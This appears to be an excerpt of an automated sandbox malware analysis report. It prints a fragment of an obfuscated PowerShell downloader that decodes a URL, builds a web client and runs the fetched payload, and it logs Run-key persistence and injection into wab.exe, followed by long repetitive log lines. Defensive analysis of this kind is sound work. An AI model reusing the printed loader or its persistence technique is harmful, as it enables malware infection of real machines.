P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0468B8D8 push eax; iretd 5_2_0468B8D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_074709F0 push eax; mov dword ptr [esp], ecx5_2_07470E7C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_23D72806 push ecx; ret 10_2_23D72819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044693D push ecx; ret 17_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00451D54 push eax; ret 17_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044B090 push eax; ret 18_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0044B090 push eax; ret 18_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00444E71 push ecx; ret 18_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00414060 push eax; ret 19_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00414060 push eax; ret 19_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00414039 push ecx; ret 19_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0482CF28 pushfd ; ret 20_2_0482CF31
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_04823AD9 push ebx; retf 20_2_04823ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_076B0E67 push eax; mov dword ptr [esp], ecx20_2_076B0E7C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C809AD push ecx; mov dword ptr [esp], ecx26_2_21C809B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0329333A push ss; iretd 26_2_0329333B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0329426F push cs; ret 26_2_03294279
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0329228B push FFFFFFDFh; iretd 26_2_0329228D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_03293AF5 push 624F56A1h; ret 26_2_03293AFA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0328FFBC push ecx; retf 26_2_0328FFE9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0328EE6C push esi; retf 26_2_0328EE97

              Persistence and Installation Behavior

              barindex
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe

              Boot Survival

              barindex
              Creates multiple autostart registry keys
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AlmindelighedenJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AlmindelighedenJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AlmindelighedenJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004047CB
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
